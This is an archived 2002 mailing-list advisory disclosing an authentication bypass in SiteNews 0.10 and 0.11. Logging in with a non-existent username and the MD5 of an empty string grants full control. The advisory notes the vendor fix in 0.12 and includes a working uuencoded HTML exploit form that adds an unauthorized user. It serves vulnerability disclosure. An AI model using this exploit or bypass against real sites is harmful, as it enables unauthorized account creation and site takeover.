SiteNews remote add user exploit PROGRAM: SiteNews AUTHOR: JP Durman (jpat_private) HOMEPAGE: http://www.linuxnetwork.nl/ VULNERABLE VERSIONS: 0.10 and 0.11 (possibly older versions as well) TYPE: remote add user exploit SEVERITY: high DESCRIPTION: SiteNews is an open-sourced system for displaying and managing news items on websites. According to its homepage, it has been downloaded almost 4000 times. ISSUE: The function GetPassword in function.php returns an empty string, when you ask for a non-existent username. This, together with the fact that the program sends usernames in cleartext and passwords as MD5 sums, means that you can log in without an account, by posting a non-existent username and the MD5 sum for an empty string as the password. SiteNews has no concept of user levels, so once you are in, you have full control over all news items and all users. The author was contacted with an explanation, an exploit and a patch on the 5th of February. Version 0.12, which is not vulnerable, was released on the 7th of February. RECOMMENDATION: I recommend that all users upgrade to version 0.12 immediately. EXPLOIT: Here is my HTML exploit for this issue. It is uuencoded. You type in a non- existent username and the user and password combination that you wish to add to the system, and the exploit creates the new user for you, despite the fact that you are not authorized. // Ulf Harnhammar metaurat_private begin 644 sitenews_exploit.html M/"%$3T-465!%($A434P@4%5"3$E#("(M+R]7,T,O+T141"!(5$U,(#0N,#$@ M5')A;G-I=&EO;F%L+R]%3B(*(FAT='`Z+R]W=W<N=S,N;W)G+U12+VAT;6PT M+VQO;W-E+F1T9"(^"CQH=&UL/@H\:&5A9#X*/'1I=&QE/E-I=&5.97=S($5X M<&QO:70@,"XQ/"]T:71L93X*/&UE=&$@:'1T<"UE<75I=CTB0V]N=&5N="U4 M>7!E(B!C;VYT96YT/2)T97AT+VAT;6P[(&-H87)S970]:7-O+3@X-3DM,2(^ M"CPO:&5A9#X*"CQB;V1Y(&)G8V]L;W(](B-F9F9F9F8B('1E>'0](B,P,#`P M,#`B(&QI;FL](B,P,#`P,#`B(&%L:6YK/2(C,#`P,#`P(@IV;&EN:STB(S`P M,#`P,"(^"CQH,3Y3:71E3F5W<R!%>'!L;VET(#`N,3PO:#$^"@H\9F]R;2!M M971H;V0](E!/4U0B(&%C=&EO;CTB:'1T<#HO+W=W=RYV:6-T:6TN8V]M+W-I M=&5N97=S+V%D;6EN+V%D9%]U<V5R+G!H<"(*96YC='EP93TB;75L=&EP87)T M+V9O<FTM9&%T82(^"E=R:71T96X@8GD@/&$@:')E9CTB;6%I;'1O.FUE=&%U M<D!P<F]N=&]M86EL+F-O;2(^56QF($@F875M;#MR;FAA;6UA<CPO83X@:6X* M,C`P,BX\<#X*"E1H:7,@97AP;&]I="!W:6QL(&%D9"!A(&YE=R!U<V5R('1O M(&$@4VET94YE=W,@:6YS=&%L;&%T:6]N+B!4:&4@97AP;&]I="!U<V5R"FES M(&)A<VEC86QL>2!A;GD@;F]N+65X:7-T96YT('5S97(L('-O('EO=2!J=7-T M('1Y<&4@<V]M92!R86YD;VT@8VAA<F%C=&5R<PIT:&5R92X\<#X*"D5X<&QO M:70@=7-E<CH\8G(^"CQI;G!U="!T>7!E/2)T97AT(B!N86UE/2)U<V5R;F%M M92(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4](FAI9&1E;B(@;F%M93TB M<&%S<W=O<F0B"G9A;'5E/2)D-#%D.&-D.3AF,#!B,C`T93DX,#`Y.3AE8V8X M-#(W92(@<VEZ93TB,"(^"CPA+2T@5&AI<R!I<R!T:&4@340U('-U;2!F;W(@ M86X@96UP='D@<W1R:6YG+B`M+3X*3F5W('5S97(Z/&)R/@H\:6YP=70@='EP M93TB=&5X="(@;F%M93TB;F5W7W5S97(B('-I>F4](C(P(CX\8G(^"CQI;G!U M="!T>7!E/2)H:61D96XB(&YA;64](F%C=&EO;C$B('9A;'5E/2(Q(B!S:7IE M/2(P(CX*3F5W('!A<W-W;W)D.CQB<CX*/&EN<'5T('1Y<&4](G1E>'0B(&YA M;64](FYE=U]P87-S=V]R9"(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4] M(G-U8FUI="(@=F%L=64](D5X<&QO:70@:70B/@H\+V9O<FT^"@H\+V)O9'D^ )"CPO:'1M;#X* ` end
This archive was generated by hypermail 2b30 : Sat Feb 16 2002 - 10:55:08 PST